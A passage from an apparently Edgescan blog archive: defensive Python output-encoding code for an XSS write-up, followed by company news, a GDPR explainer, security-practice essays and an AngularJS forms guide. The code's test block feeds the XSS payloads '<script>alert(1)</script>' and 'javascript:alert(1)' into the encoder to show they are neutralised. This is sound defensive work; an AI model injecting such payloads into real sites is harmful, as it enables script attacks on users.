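from urllib.parse import quote, urlsplit

# HTML context: every metacharacter the text lists, = included, becomes an entity.
_HTML_ENTITIES = {"&": "&amp;", "<": "&lt;", ">": "&gt;",
                  '"': "&quot;", "'": "&#x27;", "=": "&#x3D;"}


def encode_html(value: str) -> str:
    """Encode for HTML body or quoted-attribute context."""
    return "".join(_HTML_ENTITIES.get(ch, ch) for ch in value)


def encode_url_component(value: str) -> str:
    """Encode for a URL query-string component: everything but unreserved chars."""
    return quote(value, safe="")


def encode_js_string(value: str) -> str:
    """Encode for a JavaScript string literal. JSON escaping handles quotes and
    backslashes; < and > are escaped too so the data cannot close the script block."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def safe_href(candidate: str, default: str = "#") -> str:
    """Admit only http(s) or same-site absolute-path links as an href value.
    ASCII control characters and whitespace are removed before the scheme is
    read, because browsers ignore them when parsing a URL; anything else
    (javascript:, data:, protocol-relative //host) falls back to the default."""
    cleaned = "".join(ch for ch in candidate if ch > " " and ch != "\x7f")
    parts = urlsplit(cleaned)
    if parts.scheme.lower() in ("http", "https"):
        return cleaned
    if not parts.scheme and not parts.netloc and cleaned.startswith("/"):
        return cleaned
    return default


# Constructed page template: q is reflected in HTML text, in a URL inside an
# attribute, and in a JavaScript string; return_to is a user-supplied link.
SEARCH_TEMPLATE = """<!doctype html>
<p>Results for <b>{q_html}</b></p>
<a href="{next_href}">next page</a>
<a href="{return_href}">back</a>
<script>var lastQuery = {q_js};</script>
"""


def render_search_page(q: str, return_to: str) -> str:
    """Render the page with each reflection encoded for its own context.
    The next-page URL is URL-encoded first, then attribute-encoded: the
    encodings are applied in the reverse order the browser decodes them."""
    next_href = "/search?page=2&q=" + encode_url_component(q)
    return SEARCH_TEMPLATE.format(
        q_html=encode_html(q),
        next_href=encode_html(next_href),
        return_href=encode_html(safe_href(return_to)),
        q_js=encode_js_string(q),
    )


if __name__ == "__main__":
    print(render_search_page("<script>alert(1)</script>", "javascript:alert(1)"))
```

Two details matter for the bypass class discussed in the post. First, `safe_href` decides on the scheme only after stripping the control characters a browser would ignore, so a scheme broken up by a newline or tab is still recognised and rejected. Second, the attribute value is entity-encoded after the allow-list check, so an ampersand in the input becomes `&amp;` and can never be decoded by the browser into a character that changes the scheme.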
In the case where a new vulnerability is discovered on your site, it may be quicker, before a patch can be installed, for a ruleset to be added to the WAF to temporarily block this particular payload.

It is recommended that all user input be output encoded at any point where it is copied into application responses. The output encoding should depend on the context in which the untrusted input is used. At the server language level, the user input should be converted to the correct data type. For example, if an integer is expected then the user input should be converted to an integer and not stored as a string. Knowledge of how this data is handled by the server language is key: at the point where this input is copied into the application response it should be output encoded for the correct context, such as HTML, URL, JavaScript or CSS. Not identifying the correct encoding type can lead to vulnerabilities persisting in an application, or possibly introduce other vulnerabilities. Using HTML as an example, all HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc.). For URLs, the value should be URL encoded (%3c %3e %22 etc.). Additionally, user-controlled input on all pages should be subject to rigorous validation routines before it is accepted by the application.

Anthony Yalcin is a Senior Information Security Consultant at Edgescan.

### Achieving Secure Defence in Depth - Rahim Jina, COO/Co-Founder

Achieving Secure Defence in Depth, a webinar organised by Infosecurity magazine, was an informative session of expert insight into the best practices for achieving a truly comprehensive security standpoint.

The one and only Dan Raywood (shout out to him for featuring among the 100 top influencers at this year’s RSA, according to a list published by Onalytica!) chaired the conversation, and representatives from Oracle and Jardine Software were also present to provide valuable industry knowledge on how to best create and maintain in-depth security. My intervention focussed on the two areas where businesses and organisations should focus in terms of cybersecurity: creation and nurturing.

Creating a secure environment requires building a solid foundation, and this can be achieved by looking at the Secure Development Life Cycle (SDLC), Static Application Security Testing (SAST), Dynamic Application Security Testing (DAST) and toolchain integration.

An SDLC simply means that security is an integral part of the entire development process and not an addition bolted on at the end. Designing security into apps and systems is essential, not only to reduce the subsequent cost of fixing vulnerabilities that could have been prevented at the development stage, but also to increase the efficiency of security measures that are native to the app itself rather than an add-on.

Part of the SDLC, SAST, such as source code analysis, gives enterprises the flexibility to perform security tests in all types of SDLC methodologies. Both paid and open source tools are available to perform this kind of test. DAST, or runtime testing, is also an integral part of secure development: while SAST analyses the application from the inside, DAST examines the security of an application while it is running, from the outside.

Toolchain integration takes all these security measures to the next gear and allows you to match defences with how you produce code. No single tool can guarantee to cover efficiently the multidisciplinary nature of security operations, but nowadays customers are spoilt for choice of incredibly effective tools to integrate into their security systems, which can be tailored to the business’s needs. Implementing security measures is essential, but it is also important to gauge how effective these are. For this reason, metrics of efficacy should be kept for all assets, systems and apps; it is of no use to spend on security measures whose efficiency cannot be proven and which do not add value to the overall security standpoint.

The nurturing side of things, instead, focuses on the maintenance and protection of these building blocks. In fact, the security of a system inevitably decreases over time, which is why security should be a continuous effort rather than a one-time investment.

Visibility is one of the most important aspects of nurturing your security standpoint: you can’t protect what you didn’t know was there. Enterprises should have an asset management system which highlights what in their network and infrastructure needs protecting, and should aim to have a complete picture of their security posture.

Moreover, full-stack Vulnerability Management provides much more reliable and consistent protection than ad hoc, infrequent tests. Ongoing assessment and risk mapping, together with assessment of the risk that each vulnerability poses to applications and infrastructure, can inform remediation prioritisation and greatly reduce the risk of a breach.

For more information on the importance of integrated, platform-based approaches to better application security, as well as ways to apply modern strategies to improve your current security posture, please visit edgescan.com. This webinar is available to view at www.infosecurity-magazine.com; Rahim's presentation is the first one and runs for about 25 minutes.

### edgescan achieves ISO 27001:2013 Certification

We're very happy to announce that Edgescan is now a certified ISO 27001:2013 Vulnerability Management SaaS, one of very few Vulnerability Management SaaS organisations globally. The certificate can be found here.

What does this mean to you? Simply put, we can prove we deliver our Vulnerability Management SaaS in accordance with industry best practice.
In effect, we operate under a model for establishing, implementing, operating, monitoring, reviewing, maintaining and improving an information security management system within edgescan. This helps us assure you that using our SaaS is possibly less risky than engaging with other vendors who are not certified and don't have a defined Information Security Management System (ISMS). We take great care in protecting, processing and maintaining vulnerability data, and our staff are trained in cyber security best practices, from technical development to data classification and privacy.

We just thought you would like to know!

### False Positives, False Negatives and Tooling

Beware of false prophets:

Something we have encountered with our clients when using MSSPs (Managed Security Service Providers) relates to tools and validation. Tools are necessary to discover security weaknesses across the fullstack, which is nothing new. Fullstack visibility of security controls is key when operating a robust vulnerability management operation, but there are some pitfalls.

We've seen false positives being promoted to "real issues", resulting in service tickets being raised and assigned to SOC (Security Operations Centre) operations staff. After some time it is discovered that the issue is not real and the FP is simply a result of the tool not interpreting the result of a test correctly. The negative impact is wasted staff time, from developers to operations staff and everyone in between, in order to close off the false alarm. This detracts from SOC efficiency and from time that should be spent on real issues when following a risk-based approach to cyber security.

Even worse, we have seen real issues being marked as false positives, resulting in a false negative: a real issue is ignored. This is obviously much worse; a cyber security issue has just been closed off and ignored. But why?

A little knowledge is a dangerous thing. We found that in some cases the SOC operations staff simply did not understand the vulnerability, or they couldn't reproduce it or validate the issue properly. This is not uncommon, because SOC operations staff are often not experienced enough to validate complex or non-standard issues.

Jack of all trades, master of none: A weakness of a generic SOC is that it simply doesn't have the experienced staff to manage, understand and validate complex vulnerabilities. There is also a lack of bespoke tooling for validation, and a reliance on generic security tools. Protection of an enterprise takes time and experience; there are many areas where automation reduces the workload, but some aspects of cyber security take human intelligence.

Simple "Vanilla": Most SOC operations staff, frankly, don't stay long in that position, as it is relatively low paid and provides minimal experience and exposure. Attackers don't generally rely on rooms full of screens and generic out-of-the-box tools, and they have significant skill.

This is something to consider. Food for thought?

### edgescan continues to expand in revenue, staff and global clients

Dublin, 06 July 2018. edgescan announced today that its revenue has increased by 60% in the first six months of 2018. "The growth is based on global outreach and delivering something different to solve an age-old problem," says COO Rahim Jina. The edgescan staff count has doubled since 2016, now at over 40 staff, and the company is constantly looking for talented development and security experts. "We have strong ties to many of the local technical colleges and universities, which helps graduate intake. Our sponsorship of "Zero Days" amongst other events has helped with recruitment also," said Louise Fitzgerald, Customer Success Manager. edgescan's rapidly developing enterprise footprint in the USA and UK has fuelled growth in staff levels and revenue.
Many of the roles to be filled are related to feature development and operational security services.

### Payment Services Directive (PSD2) White Paper

### Eoin & the security: Security as a Service / MSS… Why?

A number of factors are driving the need for managed security services (MSS), namely expertise, cost and consistency. Key concerns when considering an MSS are detailed below.

Cost: The cost benefits of using some MSS providers may appear a very attractive proposition. MSS gives a company access to deep security expertise without the associated cost of full-time employees. For example, our edgescan™ service gives our clients access to our security engineering team, who manage the security posture of their assets. A managed service should give you the ability to reduce your capital expenditure and control your security spend without sacrificing quality. Using an MSS, you can maintain your security posture but reduce the overall cost of ownership.

Accuracy: Security is about covering all the bases; a defender needs to manage all vulnerabilities, whilst an attacker needs to exploit only one. Accuracy covers two aspects of MSS:

- firstly, the ability to detect and manage discovered vulnerabilities with confidence;
- secondly, reducing the time the business needs to patch, fix or configure, owing to the quality of the vulnerability information delivered by the MSS provider.

For example, our clients value our hybrid approach to vulnerability management, which involves human validation of every discovered vulnerability and results in virtually “false positive free" security intelligence. Your MSS should provide you with accurate, actionable security information.

Compliance and continuous management: Threat and vulnerability management, and meeting compliance requirements via 24/7 security assessment, remain the primary drivers for considering an MSS. Your MSS should assist with demonstrating compliance and continuous improvement via management information dashboards and extensible API calls for integration into your technology “stack". MSS can also help you reallocate existing resources to other security areas, or meet the need for deeper or broader expertise than is available in-house. Your MSS should address requirements where you don't have in-house expertise.

edgescan.com is a managed security service developed, managed and delivered by BCC Risk Advisory. It is a cloud-based vulnerability management platform that helps clients discover and manage system vulnerabilities on an ongoing basis. It significantly reduces the cost of ownership while significantly increasing cybersecurity resilience. edgescan provides continuous vulnerability assessment coupled with a customised reporting portal and API set to help you understand what vulnerabilities your business faces. edgescan assesses the security of both web/mobile applications and the associated servers, or indeed any deployed systems, giving you “full-stack" vulnerability management.

www.bccriskadvisory.com

### Competitive analysis & differentiators for the edgescan™ platform.

### edgescan V3.0 Preview

edgescan 3.0 is the latest version of the edgescan managed penetration testing service. View this video for a quick run-through of the new features of edgescan, including API integration, vulnerability alerting and an improved user interface.

### Edgescan Assets

The assets page displays clear and simple information about a company’s assets (e.g. IP, website, web application). Users can view both application and network vulnerability scores and a breakdown of the risks faced by the selected asset. View this video to find out more.

### edgescan & GDPR: Improving compliance and reducing the cost of cybersecurity

Some people still don’t know where to start with GDPR. Here are some simple key points to kick you off:
- Identify the personal data you collect and where it is stored. Is it stored appropriately, and how are you protecting it from a cyber standpoint? Are your applications secure, regularly tested and designed with security in mind? Can you prove this?
- Review your internal policies, including your security breach response policy: incident response, DR and BCP. What happens if something goes badly wrong? What happens in the event of a breach? Do you have mitigation controls and notification procedures in place?
- Review the type of data processing carried out, identify the legal basis for the processing and document it. Do you need all the client data you possess, and do you have a legal basis for storing it?
- Review how you handle all applicable clients' rights, including the deletion of personal data and the right to be forgotten (RTBF).
- Review if and how you seek, obtain and record client consent, and whether any changes are needed. Do clients know you are storing their data and what you are using it for? Have they consented to what you are doing? Can you prove this?
- Review your external privacy policies and EULAs, and refresh them with the changes necessary for transparency and relevancy.
- Review and update your processor/sub-processor and third-party agreements. Consider third-party risk for up- and downstream processors of your clients' data: you can outsource the service, but not the risk. Do you know whether your B2B partners are secure, store your client data properly and don't use it for any reason other than what is agreed? Do they have a policy to reflect this, and how is it policed? How often do they get technical security assessments of the systems used to process your clients' data, and how do they demonstrate this?
- Review the lawful basis for the transfer of personal data outside the EU. If you transfer data outside the EU, are you permitted to do so by the data owner (client)?
Cyber-security, GDPR, Articles and Controls: The General Data Protection Regulation (GDPR) replaces the Data Protection Directive 95/46/EC and is enforceable as of 25 May 2018. The GDPR is directly applicable in each member state and will lead to a greater degree of data protection harmonisation across EU nations. The GDPR does suggest actions to take in order to be compliant, such as a process for regularly testing, assessing and evaluating the effectiveness of technical and organisational measures for ensuring the security of the processing. From a cybersecurity standpoint this covers aspects such as technical assessment, patching and maintenance, vulnerability management, threat detection/prevention, asset and service profiling and visibility, and overall better governance of an organisation's digital estate and technical controls.

EU GDPR – Article 32, Security of Processing: “Taking into account the state of the art, the costs of implementation and the nature, scope, context and purposes of processing as well as the risk of varying likelihood and severity for the rights and freedoms of natural persons, the controller and the processor shall implement appropriate technical and organisational measures to ensure a level of security appropriate to the risk, including inter alia as appropriate: […]”

GDPR in effect mandates that appropriate technical security controls are required, amongst other equally important controls (citizen access to and control of their data), to ensure a level of security based on the data and the risk/impact of its disclosure. “To ensure a level of security appropriate to the risk” is an important aspect which should be considered. Given that a firm may be the custodian of users' financial or Personally Identifiable Information (PII), there is a duty of care to protect the data and ensure proper authorisation and security controls surround it.
From a technical standpoint, security assessments and vulnerability management are some of the tools used to help maintain that level of assurance. edgescan provides continuous assessment of technical systems in order to help discover vulnerabilities which may lead to a breach. The “win” in using edgescan is that you have an auditable history of all assessments and of each individual vulnerability, showing the vulnerability lifecycle and making it easy to demonstrate compliance and continuous improvement. The idea of a single annual or bi-annual assessment is becoming unsustainable given the rate of change of systems, particularly cloud-based deployments. Continually assessing security posture on an ongoing basis, exploiting a combination of automation and human intelligence, is gaining traction globally, resulting in cost reduction and increased rigour depending on the vendor used. There is a trend in the industry to move towards Managed Security Service Providers (MSSPs) and to leverage experts who deliver services such as vulnerability management on a full-time basis. An MSSP should address requirements where you don't have in-house expertise.

EU GDPR – Recitals of Interest

Recital (78): “The protection of the rights and freedoms of natural persons with regard to the processing of personal data require that appropriate technical and organisational measures be taken to ensure that the requirements of this Regulation are met.”

Appropriate technical measures are easily confirmed and identified using edgescan, as a complete security history can be reviewed for any period of time on an ongoing basis.
In a reasonably fast-moving technical environment that undergoes frequent change (e.g. a cloud environment, or agile system development), an annual or bi-annual security assessment of the systems in scope may seem a reasonable approach, but the risk lies in the rate of change of the environment and the resulting window of exposure due to the infrequency of technical security assessment. Continuous assessment, as per the edgescan service, helps you maintain constant vigilance in order to assist with GDPR compliance.

“In order to be able to demonstrate compliance with this Regulation, the controller should adopt internal policies and implement measures which meet in particular the principles of data protection by design and data protection by default…”

Demonstrating compliance in relation to cyber security is easily delivered, as the edgescan portal provides a complete history of all vulnerabilities (web and infrastructure) discovered and closed over the entire licensing period. Many of our clients in highly regulated industries use edgescan to demonstrate to external auditors the constant assessment approach they have adopted to cyber security. Data protection by default can be assessed in both pre-production environments and deployed production systems. Using edgescan to detect and mitigate vulnerabilities (via WAF integration) is core to being able to demonstrate compliance.

“Such measures could consist, inter alia, of minimising the processing of personal data, pseudonymising personal data as soon as possible, transparency with regard to the functions and processing of personal data, enabling the data subject to monitor the data processing, enabling the controller to create and improve security features.”

“You can't improve what you can't measure”: edgescan gives our clients the ability to continuously improve by tracking security posture at any point in time.
The metrics supplied by edgescan let our clients easily focus on the most common vulnerability and its root cause, and identify quick wins in a clear and easy fashion.

“When developing, designing, selecting and using applications, services and products that are based on the processing of personal data or process personal data to fulfil their task, producers of the products, services and applications should be encouraged to take into account the right to data protection when developing and designing such products, services and applications and, with due regard to the state of the art, to make sure that controllers and processors are able to fulfil their data protection obligations. The principles of data protection by design and by default should also be taken into consideration in the context of public tenders.”

In pre-production environments edgescan gives our clients the ability to assess the security of a solution quickly and on demand. This assists with detecting cyber security issues before a system is deployed to production, resulting in a “secure by default” posture.

Recital (49) reads: The processing of personal data to the extent strictly necessary and proportionate for the purposes of ensuring network and information security, i.e. the ability of a network or an information system to resist, at a given level of confidence, accidental events or unlawful or malicious actions that compromise the availability, authenticity, integrity and confidentiality of stored or transmitted personal data, and the security of the related services offered by, or accessible via, those networks and systems, by public authorities, by computer emergency response teams (CERTs), computer security incident response teams (CSIRTs), by providers of electronic communications networks and services and by providers of security technologies and services, constitutes a legitimate interest of the data controller concerned.
This could, for example, include preventing unauthorised access to electronic communications networks and malicious code distribution and stopping ‘denial of service’ attacks and damage to computer and electronic communication systems.

Detecting weaknesses in the security posture of an ever-changing environment is core to what edgescan provides. Our full-stack approach to security gives our users visibility of both web application and supporting host/cloud security. As new deployments and features are delivered, edgescan automatically assesses the security posture of the deployment and its associated subsystems. This approach, including validation of all discovered vulnerabilities by our experts, in effect removes the need for expensive consulting firms and also improves security resilience on an ongoing basis.

Recital (81): “To ensure compliance with the requirements of this Regulation in respect of the processing to be carried out by the processor on behalf of the controller, when entrusting a processor with processing activities, the controller should use only processors providing sufficient guarantees, in particular in terms of expert knowledge, reliability and resources, to implement technical and organisational measures which will meet the requirements of this Regulation, including for the security of processing. The adherence of the processor to an approved code of conduct or an approved certification mechanism may be used as an element to demonstrate compliance with the obligations of the controller.”

edgescan's continuous and on-demand full-stack approach provides sufficient guarantees that your systems are constantly being assessed for security weaknesses. Providing historical assessment frequency, vulnerability data and proof of continuous improvement and vigilance is what is needed to demonstrate GDPR compliance.
You can easily demonstrate compliance with Recital (83): “In order to maintain security and to prevent processing in infringement of this Regulation, the controller or processor should evaluate the risks inherent in the processing and implement measures to mitigate those risks, such as encryption. Those measures should ensure an appropriate level of security, including confidentiality, taking into account the state of the art and the costs of implementation in relation to the risks and the nature of the personal data to be protected. In assessing data security risk, consideration should be given to the risks that are presented by personal data processing, such as accidental or unlawful destruction, loss, alteration, unauthorised disclosure of, or access to, personal data transmitted, stored or otherwise processed which may in particular lead to physical, material or non-material damage.”

edgescan detects weaknesses in your cyber security posture so you can quickly address issues as they are found. Via our API, alerting or integrations you can easily and quickly understand risks by priority, evaluate potential impacts, and prevent the damage of being hacked and the fines associated with GDPR non-compliance.

Want to know more? edgescan: edgescan.com. Client reviews: Gartner Peer Insights.

### edgescan – ixtel UAE partnership

Date: 28 October 2015, Dublin, Ireland

edgescan has announced a new partnership in the UAE with iXTEL, one of the leading suppliers in the UAE of network services for converged infrastructures and security solutions.

Why ixtel? “We believe iXTEL are the right level of partner for us in relation to providing support for edgescan in the UAE. iXTEL (www.ixtel.com) are a great addition to the edgescan family. This helps spread our reach across the UAE with offices in Dubai, Abu Dhabi and Oman” – says Eoin Keary, edgescan Director and CTO.
“I'm happy we can bring edgescan to the region on the right footing… edgescan is proving the managed services model is very cost effective and provides superior coverage and depth in relation to cyber vulnerability management. I'm happy we can provide edgescan in the UAE…” – says Rahim Jina, Operations Director for edgescan.

For further information, please contact: Yannick Bordereau, edgescan. Email: yannick@edgescan.com. P: +353 (1) 681 5330

### edgescan announces the release of the edgescan-jira plugin

Date: 30/9/2015, Dublin, Ireland

We're delighted to announce the release of the edgescan Jira Plugin. This is a free plugin for Jira which uses the new edgescan API to integrate edgescan data with Atlassian's powerful issue tracking platform. With the plugin installed and configured, a Jira issue will be automatically created for each new vulnerability found on your assets. Once imported into Jira you can assign these issues to members of your development team and use Jira's features to track progress towards closing them. Then, when the vulnerability has been verified as fixed by one of our engineers, the plugin will automatically mark the corresponding Jira issue as closed. The plugin is available as a jar file, and a user manual detailing how to install and configure it may be found here. The plugin should be added to the Atlassian Marketplace in the near future. For those interested, we've also made the source code for the plugin available on GitHub. We hope you enjoy using the plugin and look forward to hearing your feedback.
For further information, please contact us: Email: info@edgescan.com. P: +353 (1) 681 5330

### edgescan announces new Gartner status award

edgescan: “sample vendor” in the Gartner Hype Cycle for Application Security, Software as a Service (SaaS) and Cloud Security 2015

Date: 27/7/2015, Dublin, Ireland

edgescan, the leading provider of web application and server risk management solutions, announced today that it has been listed as a “sample vendor” in the Gartner Hype Cycle for Application Security, Software as a Service (SaaS) and Cloud Security 2015.

“This validates our approach to vulnerability management. After providing Gartner with numerous vendor briefings, our approach to combining both Layer-7 (Web Applications) and hosting infrastructure vulnerability management as one service is proving positive.” – Rahim Jina, Director with BCC Risk Advisory, edgescan's parent company.

“Hackers don't really care if a vulnerability is in the web application layer or the hosting layer of a system's technical stack. Attackers attack the weakest point regardless. edgescan provides superior coverage across all layers combining full-stack automation with manual validation of all discovered vulnerabilities.” – Eoin Keary (CTO)

For further information, please contact us: Email: sales@edgescan.com. P: +353 (1) 681 5330

Protect Your Mobile Apps with MAST: Being recognized by Gartner reaffirms our commitment to delivering top-tier solutions. That's why our Mobile Application Security Testing (MAST) protects our clients from vulnerabilities while ensuring compliance. From our offices in Dublin and New York, we help secure your mobile solutions with cutting-edge expertise.

### edgescan is a “Notable Vendor” in Gartner's Magic Quadrant for Managed Security Services

At edgescan we put great effort into ensuring our Cyber Security SaaS (Security as a Service) solution meets the highest industry standards.
edgescan has been recognized by the industry in the following ways:

- PCI SSC (Payment Card Industry Security Standards Council): edgescan is the only ASV-certified SaaS of its kind which provides both full-stack vulnerability management and continuous assessment on demand.
- Gartner Cyber Security – Gartner Peer Insights – Highest Score – 2017: one of the highest-scoring Application Security Testing (AST) solutions on the Gartner-moderated Peer Insights portal.
- Managed Service Company of the Year: we've been nominated for MSC of the year due to our global expansion and penetration across many industry verticals such as Gaming, Media, Energy and Finance, to name but a few.
- Winner – Rising Star of the Year: edgescan triumphed in the Tech Excellence Awards 2016 “Rising Star” category by leading the charge with our SaaS and growing it by over 400% in the past year.
- Gartner Hype Cycle for Application Security, SaaS and Cloud Security 2015 – Application as a Service: edgescan, the leading provider of web application and server risk management solutions, was listed as a “sample vendor” in the Gartner Hype Cycle for Application Security, Software as a Service (SaaS) and Cloud Security 2015 (see the announcement above).

Try edgescan today: Gartner-accredited and multi-award-winning. See the link below, contact the edgescan team directly at info@edgescan.com, or find our international numbers on our Contact Us page.

### Security done wrong and blowing the budget… how not to secure your business

The State of Cyber Security: We don't want a 15 year old breaching our systems, stealing data and taking 13% off our share price as a result… hmm, I think not. If I wanna be hacked, the hacker has got to be elite, like an uber hacker, right!! It is strikingly obvious that security is still weak for both the large enterprise and smaller organisations alike.
Take TalkTalk, hacked by a 15-year-old, for example… We live in a world where multi-million euro businesses can be drastically hit by ANYONE with the will, determination and curiosity, I sh*t you not!!

Poor practices we accept in the industry

Yearly security testing on sites & systems that change frequently: We perform annual testing of our systems, in a time-limited manner. Our systems are in a constant state of flux (for the reasons below) but we still only do the annual security test. See anything wrong here? Three words for you… Window Of Exposure.

Changes in code: These happen more frequently; we are more “Agile” than ever. We push code frequently and spread the risk of dev failure, as opposed to hoping everything works at the end of the project. The more we change, the less valuable our previous security report is. Within days of a security test the value of the report is degraded, because the system has changed since the report was written. With this in mind, as change occurs and no security verification is done, our window of exposure grows.

Changes in the supporting environment: We patch systems where we can, as per our patch management policy, but this is never as easy as it sounds. Patching live systems can have negative effects on the hosted systems. Patches can break stuff!! So we don't patch as often… Day to day, we are secure one day and the next we have a vulnerability, because it has just been discovered and made public knowledge. Annual testing does not scale to the dynamic nature of the systems we manage and own.

Automate everything: Highly automated testing is weak; there are many aspects of web data flow which break automation and reduce coverage. Highly automated solutions can impact or harm live systems, for example by submitting thousands of emails/tickets, impacting performance or exhausting system resources. Highly automated solutions can submit sensitive web forms and corrupt data or system state.
Many vulnerability scanners submit invasive attacks which appear idempotent but in the context of the system are very destructive. Un-tuned automation can result in DoS (Denial of Service) issues; many scanners are excessively aggressive when scanning.

Risk is not linear: Automation does not understand risk. Risk is a human concept and needs to be assessed by humans. Not all vulnerabilities are equal; it depends on the logical context and where a given type of vulnerability is situated.

Secure the web app developer code only: Is a web application only developer code? It appears from various studies that circa 90% of an average web application is framework/component code, not written by the developer at all. Focusing on developer-written code alone is not application security!!

Component security: As an industry we don't talk much about the 90% of code running our web applications which we did not develop… funny that. Without component security you are not doing application security. Do we maintain components/frameworks the way we patch OSs?? No hope. Do we have a component security policy the same way we have a patch management policy? Nope.

OS security: 65% of vulnerabilities are due to poor patching, misconfiguration or deprecated services. Yep, 65% of vulnerabilities (edgescan vulnerability stats report 2015). “Hackers don't give a Sh1t”, so if you have focused on web app security only, they shall come in via the OS! Makes sense?

“We use SSL” (yes, I've said it): People still say this. No idea why, given SSL v2 and v3 are broken!!

“We use a WAF” (again, more bullsh*t): Logical vulnerabilities and behavioural weaknesses, that's where the money is anyway!! Your WAF don't mean diddly on its own, as it only detects technical attacks, not logical weaknesses.
### Risk – Medieval approaches to AppSec

Vulnerability management involves a little more than finding security issues in code and/or hosting systems… I find that much of the industry does not understand that vulnerability management, penetration testing, threat detection, endpoint detection, malware prevention and even anti-virus services and tools are about managing risk. Managing risk is about reducing it to a suitable level based on the cost of reducing it in the first place. There is no point in spending lots of time and effort on issues which have little impact or which are very unlikely. First, we want to reduce the impact of the stuff which has a decent chance of occurring and would be a real pain in the ass if it happened: it would disrupt our business, etc.

“A situation involving exposure to danger…”

So blindly throwing tools at a problem to help discover risks to your business is not going to work… but why??

Tools don't understand risk: Automated tools cannot give you an idea of risk. They find technical bugs, which manifest themselves as security vulnerabilities if they introduce the potential of risk. A tool does not understand what a risk is in the context of “a situation involving exposure to danger…”. Tools find bugs. – Blessed are the tool makers who hand-craft the tools of the interweb to detect systems unworthy of the title “secure”. – Nobody expects the Spanish Inquisition!!

People will not understand risk without understanding what is at risk: To understand a potential risk faced by a system, the individual making the risk-based decision needs to understand the system. The fact remains most security folks don't have time to understand what the system is/does and therefore can't apply a reflective, relative risk assessment.
– “The oldest and strongest emotion of mankind is fear, and the oldest and strongest kind of fear is fear of the unknown”

Tools may discover risk in a risky way!!: Many security assessment tools are not designed, out of the box, to be production safe. Production-safe testing requires rule tuning such that detection of technical vulnerabilities does not invoke invasive or disruptive tests. We don't want our assessment methodology to damage our sick patient. – “Our chief weapon is surprise, fear and surprise; two chief weapons, fear, surprise, and ruthless efficiency! Er, among our chief weapons are: fear, surprise, ruthless efficiency, and near fanatical devotion…”

Risk-based approach – Really?? Wow!: All risk management is based on, er, um, risk. If you hear someone talking about “a risk-based approach” when discussing application security, ask them “what is the risk of a kick in the ass?” or “what other approaches are there?” – “A ship is always safe at the shore – but that is NOT what it is built for.”

Vulnerability is the state of being open to injury… All vulnerabilities are not created equal: Bottom line is, how open are you to the possibility of said injury? How bad can the injury be? We don't need to fix all the bugs, just the ones that matter (those which may injure the business or your clients). To understand “what matters” you need to understand the context of the issue. Tools alone can't do this; that's why we developed edgescan.com…

### edgescan 2016 Stats Report

### Skillful, Scaleful Fullstack Security in a state of constant flux

Eoin Keary's talk at AppSec Cali 2016 – Video & Slides. Please feel free to share this material with others as a work aid for building more secure code and applications. Download Slides here – Skillful Scaleful Fullstack Security in a state of Constant Flux

### Ruby secure coding workshop

Owen Mooney, edgescan's lead developer, delivered a talk about common risks faced when coding in Ruby and Ruby on Rails.
The talk covered some best practices and pitfalls when writing a secure web application in Ruby on Rails, with examples of how to deal with the OWASP Top 10 as well as some Ruby-specific vulnerabilities. Click here to access the Git repository with the working code.

Please follow these steps in order to get the app to work:

To install, you must have ruby, gem and bundler installed. Run the following command to install dependencies:

To get the SQL injection examples working, you will have to perform a few additional steps. If you want to use MySQL, edit the config/database.yml file: specify the adapter as mysql2 and then set the username, password, database and host properties as appropriate. In any case, you must run the following tasks to create/migrate the database:

To create some data to populate the database, run rails console and use the following command:

You can change the attributes appropriately and run the command multiple times. To run the application, simply run:

The bundle exec can be omitted if you are using some sort of Ruby environment manager like RVM. Have fun!

### edgescan 2016 Stats Report Infographic

### Rahim Jina's talk at AppSec Cali 2016 – Video & Slides

“Hard to Port! A Snapshot of the Vulnerability Landscape in 2015”, Rahim Jina's talk at AppSec Cali 2016. Please feel free to share this material with others as a work aid for building more secure code and applications. Hard to Port – Download Slides Here

### Eoin Keary at Infosecurity Europe 2015

Eoin Keary, edgescan director, founder and CTO, at the Infosecurity Europe 2015 Conference.

### AngularJS and forms security & design

Overview: Rich internet applications make use of the powerful features that new web browsers come equipped with. The web has come a long way since the dull, stateless, server-generated HTML pages of the 90s. Today it is possible to interact with almost any web page, opening a myriad of possibilities to the user and to malicious users alike. JavaScript has come to play a major role in web development, from the old days when it was merely used to manipulate the DOM (Document Object Model) via HTML and XML to today's powerful JS frameworks taking advantage of the much lighter JSON (JavaScript Object Notation) to send and receive data to and from servers. Here at edgescan™ our JS framework of choice is AngularJS. Angular is pretty cool in the sense that it allows developers to create dynamic web applications by creating reusable components such as services, directives and factories; these components can be injected into the different parts of a web application, thus helping developers adhere to the all-important DRY (Don't Repeat Yourself) principle.
AngularJS adheres to the MVC design pattern (Model, View, Controller), where the model relates to the data that comes from and is sent to an API, the view comprises the HTML and related directives for DOM manipulation, and the controller handles all the business logic and is the nexus between models and views.

Forms: Forms are always a contentious topic in web development, not only from a design point of view but from a security one too. One of the most important considerations when designing and coding forms is that any effort to enforce client-side security upon forms can be easily bypassed, either by disabling JS in the browser or by manipulating requests and responses. Likewise, any attempt to blacklist words or symbols from being input into a form is futile. From this standpoint it is very clear that the responsibility for securing user input rests at the server side. Users cannot be trusted, and all user input must be validated and sanitised on the server. Angular comes alive in the browser, and as such it can be turned off, meaning a malicious user can still reach our DB or server if server-side measures are not in place. Having discussed security in the context of server side and client side, we can then focus on making our forms as user friendly as possible, by ensuring they are functional, short (as short as the demand for data allows!) and keep users in the loop as to what is happening both during the fill-in process and upon submission.

Validation in action! There are two fields in the above form that need to be validated to ensure consistency in the information users can input: the email and phone number fields. For this, Angular provides us with native form validation directives to help us along the way. The available helpers are:

Therefore, if we wish to ensure a user will only enter numbers in the phone number field, or a valid email address in the corresponding field, we could do the following:

Wow!
That looks like a lot of code! However, it is necessary if we want to:

- ensure some sort of consistency in the inputs we accept in our application;
- help keep the user informed as to what is happening.

The second point is a very interesting one, as any type of front-end validation must always be accompanied by an error message so as to let the user know what is happening, both during form completion and upon submission, as suggested by Jakob Nielsen’s 10 heuristics for user interface design: “Visibility of system status: The system should always keep users informed about what is going on, through appropriate feedback within reasonable time.”

Let’s take a closer look at the code. The email field looks like this:

The magic happens at `ng-pattern`, where we make use of Angular’s native service to include a regular expression (regex) that tries to identify the input as a valid email address. Regex can be very complex; the above regex provides us with the minimum necessary filter to ensure the email address entered is of the correct format, that is, including a ‘.’ (dot) and an @ symbol. Whether the email address is real or not, well, we can’t really check that and we have to leave it to our user’s good conscience!

There are two more important bits related to usability:

